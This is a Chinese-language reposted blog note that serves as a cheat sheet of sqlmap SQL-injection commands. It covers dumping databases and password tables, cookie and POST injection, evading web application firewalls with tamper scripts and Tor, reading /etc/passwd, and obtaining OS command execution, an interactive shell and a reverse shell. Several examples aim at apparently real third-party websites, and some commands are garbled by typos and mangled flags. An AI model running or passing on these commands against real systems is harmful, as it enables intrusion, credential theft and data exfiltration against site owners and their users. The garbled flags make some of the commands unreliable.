标签:SQLMap sqlmap dbms http 笔记 常用命令 php id smart
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,具体来说,它是利用现有应用程序将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句,下面我们将演示SQL注入的一些原理性的东西.
常用爆库语句: 常用的爆库语句,常用脱裤子.
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 --identify-waf #测试是否有WAF
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 --current-db #查询当前数据库
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 --users #查询所有用户名
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 --current-user #查询当前用户名
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 --dbs #列出所有数据库
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 -D "mysql" --tables #获取数据库中的表
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 -D "mysql" -T "host" --columns #获取表的列名称
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 -D "mysql" -T "host" --dump #脱mysql.host的裤子
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 -D "mysql" --dump-all #脱mysql数据库的裤子
sqlmap -u "http://127.0.0.1/index.php?id=1" -v 3 -D "mysql" -T "user" -C "Host,User,Password" --dump
Cookie注入: 默认情况使用GET/POST注入,level >=2使用cookie注入
,level >=3使用User-agent/Referer注入
.
sqlmap -u "http://127.0.0.1/index.php" -v 3 --cookie id=1 --level 2 #判断是否可注入
sqlmap -u "http://127.0.0.1/index.php" -v 3 --cookie id=1 --dbs --level 2 #猜数据库名
sqlmap -u "http://127.0.0.1/index.php" -v 3 --cookie id=1 --tables --level 2 #猜表名称
sqlmap -u "http://127.0.0.1/index.php" -v 3 --cookie id=1 -T 表名 --clumns --level 2 #猜字段
sqlmap -u "http://127.0.0.1/index.php" -v 3 --cookie id=1 -T 表名 --clumns --dump --level 2 #猜内容
延时注入:
Sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html --dbs --delay 1
sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html --dbs --safe-freq 3
POST注入:
具体流程:
(1)浏览器打开目标地址http:// www.xxx.com /Login.asp
(2)配置burp代理(127.0.0.1:8080)以拦截请求
(3)点击login表单的submit按钮
(4)这时候Burp会拦截到了我们的登录POST请求
(5)把这个post请求复制为txt, 我这命名为test.txt 然后把它放至sqlmap目录下
(6)运行sqlmap并执行如下命令:
1、列数据库:
sqlmap -r test.txt -p username –dbs
注:-r表示加载一个文件,-p指定参数
2、选择一个数据库列表名
Sqlmap -r test.txt -p username -D mysql –tables
3、猜列名
Sqlmap -r test.txt -p username -D mysql -T user –columns
4、猜字段名
sqlmap -r test.txt -p username -D mysql -T user -C “User,Password” –dump
检测防火墙:
首选
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10 --identify-waf
备选
sqlmap -uhttp://yiliao.kingdee.com/contents.php?id=51&types=4 –thread 10 --check-waf
使用参数绕防火墙
使用任意浏览器进行绕过,尤其是在WAF配置不当的时候
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --random-agent -v2
禁止使用系统的代理,直接连接进行注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --ignore-proxy
清空会话,重构注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --flush-session
使用参数--no-cast ,进行字符码转换
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --hex
对移动端的服务器进行注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 –mobile
匿名注入
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 –tor
使用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --hpp-v 3
使用长的延时来避免触发WAF的机制,这方式比较耗时
sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --delay=3.5 --time-sec=60
使用代理进行注入
Sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4 --proxy=211.211.211.211:8080
--proxy-cred=211:985
注入点:http://testasp.vulnweb.com/Login.asp
几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass
绕过WAF:
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py" 使用脚本
----------------------------------------------------------
常用脚本说明:
apostrophemask.py 用utf8代替引号
equaltolike.py like 代替等号
space2dash.py
https://blog.csdn.net/Fly_hps/article/details/80198827
https://blog.csdn.net/u011781521/article/category/6504894
其他选项
sqlmap -u "" --smart --dbms "mysql" --users #列数据库用户
sqlmap -u “ –smart –dbms “Mysql” --dbs#列数据库
sqlmap -u “ –smart –dbms “Mysql”–passwords #数据库用户密码
sqlmap -u “ –smart –dbms “Mysql”–passwords-U root -v 0 #列出指定用户数据库密码
sqlmap -u “ –smart –dbms “Mysql” –dump-all -v 0 #列出所有数据库所有表
sqlmap -u “ –smart –dbms “Mysql”–privileges #查看权限
sqlmap -u “ –smart –dbms “Mysql”–privileges -U root #查看指定用户权限
sqlmap -u “ –smart –dbms “Mysql” –is-dba -v 1 #是否是数据库管理员
sqlmap -u “ –smart –dbms “Mysql” –roles #枚举数据库用户角色
sqlmap -u “ –smart –dbms “Mysql”–udf-inject #导入用户自定义函数(获取系统权限!)
sqlmap -u “ –smart –dbms “Mysql”–dump-all –exclude-sysdbs -v 0 #列出当前库所有表
sqlmap -u “ –smart –dbms “Mysql” –union-check #是否支持union 注入
sqlmap -u “ –smart –dbms “Mysql”–union-cols #union 查询表记录
sqlmap -u “ –smart –dbms “Mysql” –union-test #union 语句测试
sqlmap -u “ –smart –dbms “Mysql” –union-use –banner #采用union 注入
sqlmap -u “ –smart –dbms “Mysql”–union-test –union-tech orderby #union 配合 order by
sqlmap -u “ –smart –dbms “Mysql”–method “POST” — data “id=1&cat=2″ #post注入
sqlmap -u “ –smart –dbms “Mysql”–cookie “COOKIE_VALUE” #cookie注入
sqlmap -u “ –smart –dbms “Mysql”-b #获取banner信息
sqlmap -u “http://url/news?id=1” –level=3 –smart-v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news?id=1” –level=3 –smart–proxy”http://127.0.0.1:8118” #代理注入
sqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE“ #指定关键词
sqlmap -u “ –smart –dbms “Mysql”–sql-shell #执行指定sql命令
sqlmap -u “ –smart –dbms “Mysql”–file /etc/passwd
sqlmap -u “ –smart –dbms “Mysql”–os-cmd=whoami #执行系统命令
sqlmap -u “ –smart –dbms “Mysql”–os-shell #系统交互shell
sqlmap -u “ –smart –dbms “Mysql”–os-pwn #反弹shell
sqlmap -u “ –smart –dbms “Mysql”–reg-read #读取win系统注册表
sqlmap -u “ –smart –dbms “Mysql” –dbs-o “sqlmap.log” #保存进度
sqlmap -u “ –smart –dbms “Mysql” –dbs -o “sqlmap.log” –resume #恢复已保存进度
标签:SQLMap,sqlmap,dbms,http,笔记,常用命令,php,id,smart 来源: https://www.cnblogs.com/LyShark/p/10632252.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。